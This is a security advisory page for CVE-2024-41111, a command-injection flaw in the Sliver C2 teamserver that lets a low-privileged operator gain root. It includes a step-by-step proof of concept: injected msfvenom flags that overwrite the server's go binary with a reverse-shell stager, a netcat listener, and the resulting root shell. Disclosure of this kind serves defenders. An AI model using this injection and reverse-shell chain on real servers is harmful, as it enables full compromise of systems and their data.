ghsa-hc5w-gxxr-w8x8
Vulnerability from github
Published
2024-07-18 20:23
Modified
2024-08-02 23:10
Summary
Sliver Allows Authenticated Operator-to-Server Remote Code Execution
Details

Description

Sliver version 1.6.0 (prerelease) is vulnerable to RCE on the teamserver by a low-privileged "operator" user. The RCE is as the system root user.

Impact

As described in a past issue, "there is a clear security boundary between the operator and server, an operator should not inherently be able to run commands or code on the server." An operator who exploited this vulnerability would be able to view all console logs, kick all other operators, view and modify files stored on the server, and ultimately delete the server.

Reproduction

First configure the Sliver server in multiplayer mode and add an operator profile.

Next, compile a slightly older version of the Sliver client. The commit after 5016fb8d updates the Cobra command-line parsing library in the Sliver client to strictly validate command flags.

git checkout 5016fb8d VERSION=1.6.0 make client

The latest server version is targeted:

All hackers gain exalted [*] Server v1.6.0 - bdfd89167dd47aece2397c638d482f94f3f91cba [*] Client 1.6.0 - 5016fb8d7cdff38c79e22e8293e58300f8d3bd57 [*] Welcome to the sliver shell, please type 'help' for options`

The exploit uses a command injection in the generate msf-stager to inject the --out flag to msfvenom. We overwrite Sliver's own go binary at /root/.sliver/go/bin/go:

``` sliver > generate msf-stager --lhost 192.168.0.128 --lport 8888 --advanced --platform=linux&--payload=linux/x64/shell_reverse_tcp&--format=elf&--out=/root/.sliver/go/bin/go

[*] Sliver implant stager saved to: [...] ```

The other injected flags are to force a Linux payload, and not necessary if running the Sliver server on Windows.

If you check the saved implant locally on the client, it's 0 bytes as the output got written to the file on the server instead.

On the attacking machine, setup a netcat shell:

$ nc -lvp 8888 Listening on 0.0.0.0 8888

Trigger the stager by running a command which executes /root/.sliver/go/bin/go:

sliver > generate beacon --mtls 1.2.3.4 [*] Generating new windows/amd64 beacon implant binary (1m0s) [*] Symbol obfuscation is enabled ⠼ Compiling, please wait ...

A root shell will pop:

$ nc -lvp 8888 Listening on 0.0.0.0 8888 Connection received on 192.168.0.183 39238 whoami root

The vulnerable code was introduced in https://github.com/BishopFox/sliver/pull/1281

Show details on source website


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.6.0-dev"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/bishopfox/sliver"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.5.40"
            },
            {
              "fixed": "1.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-41111"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74",
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-18T20:23:24Z",
    "nvd_published_at": "2024-07-18T23:15:02Z",
    "severity": "HIGH"
  },
  "details": "## Description\n\nSliver version 1.6.0 (prerelease) is vulnerable to RCE on the teamserver by a low-privileged \"operator\" user. The RCE is as the system root user.\n\n## Impact\nAs described in a [past issue](https://github.com/BishopFox/sliver/issues/65), \"there is a clear security boundary between the operator and server, an operator should not inherently be able to run commands or code on the server.\" An operator who exploited this vulnerability would be able to view all console logs, kick all other operators, view and modify files stored on the server, and ultimately delete the server.\n\n## Reproduction\n\nFirst configure the Sliver server [in multiplayer mode and add an operator profile](https://sliver.sh/docs?name=Multi-player+Mode).\n\nNext, compile a slightly older version of the Sliver client. The commit after 5016fb8d updates the Cobra command-line parsing library in the Sliver client to strictly validate command flags.\n\n```\ngit checkout 5016fb8d\nVERSION=1.6.0 make client\n```\n\nThe latest server version is targeted:\n\n```\nAll hackers gain exalted\n[*] Server v1.6.0 - bdfd89167dd47aece2397c638d482f94f3f91cba\n[*] Client 1.6.0 - 5016fb8d7cdff38c79e22e8293e58300f8d3bd57\n[*] Welcome to the sliver shell, please type \u0027help\u0027 for options`\n```\n\nThe exploit uses a command injection in the `generate msf-stager` to inject the `--out` flag to `msfvenom`. We overwrite Sliver\u0027s own go binary at `/root/.sliver/go/bin/go`:\n\n```\nsliver \u003e generate msf-stager --lhost 192.168.0.128 --lport 8888 --advanced --platform=linux\u0026--payload=linux/x64/shell_reverse_tcp\u0026--format=elf\u0026--out=/root/.sliver/go/bin/go\n\n[*] Sliver implant stager saved to: [...]\n```\n\nThe other injected flags are to force a Linux payload, and not necessary if running the Sliver server on Windows.\n\nIf you check the saved implant locally on the client, it\u0027s 0 bytes as the output got written to the file on the server instead.\n\nOn the attacking machine, setup a netcat shell:\n\n```\n$ nc -lvp 8888\nListening on 0.0.0.0 8888\n```\n\nTrigger the stager by running a command which executes `/root/.sliver/go/bin/go`:\n\n```\nsliver \u003e generate beacon --mtls 1.2.3.4\n[*] Generating new windows/amd64 beacon implant binary (1m0s)\n[*] Symbol obfuscation is enabled\n \u283c  Compiling, please wait ...\n```\n\nA root shell will pop:\n\n```\n$ nc -lvp 8888\nListening on 0.0.0.0 8888\nConnection received on 192.168.0.183 39238\nwhoami\nroot\n```\n\nThe vulnerable code was introduced in https://github.com/BishopFox/sliver/pull/1281\n",
  "id": "GHSA-hc5w-gxxr-w8x8",
  "modified": "2024-08-02T23:10:53Z",
  "published": "2024-07-18T20:23:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/BishopFox/sliver/security/advisories/GHSA-hc5w-gxxr-w8x8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41111"
    },
    {
      "type": "WEB",
      "url": "https://github.com/BishopFox/sliver/issues/65"
    },
    {
      "type": "WEB",
      "url": "https://github.com/BishopFox/sliver/pull/1281"
    },
    {
      "type": "WEB",
      "url": "https://github.com/BishopFox/sliver/commit/0deaee625d14c6f05f63c86e5c3b7ae623a1138f"
    },
    {
      "type": "WEB",
      "url": "https://github.com/BishopFox/sliver/commit/5016fb8d7cdff38c79e22e8293e58300f8d3bd57"
    },
    {
      "type": "WEB",
      "url": "https://github.com/BishopFox/sliver/commit/d8ff64222dc69d931197d0bbae3fba11dbe17533"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/BishopFox/sliver"
    },
    {
      "type": "WEB",
      "url": "https://sliver.sh/docs?name=Multi-player+Mode"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Sliver Allows Authenticated Operator-to-Server Remote Code Execution"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.


Loading…

Loading…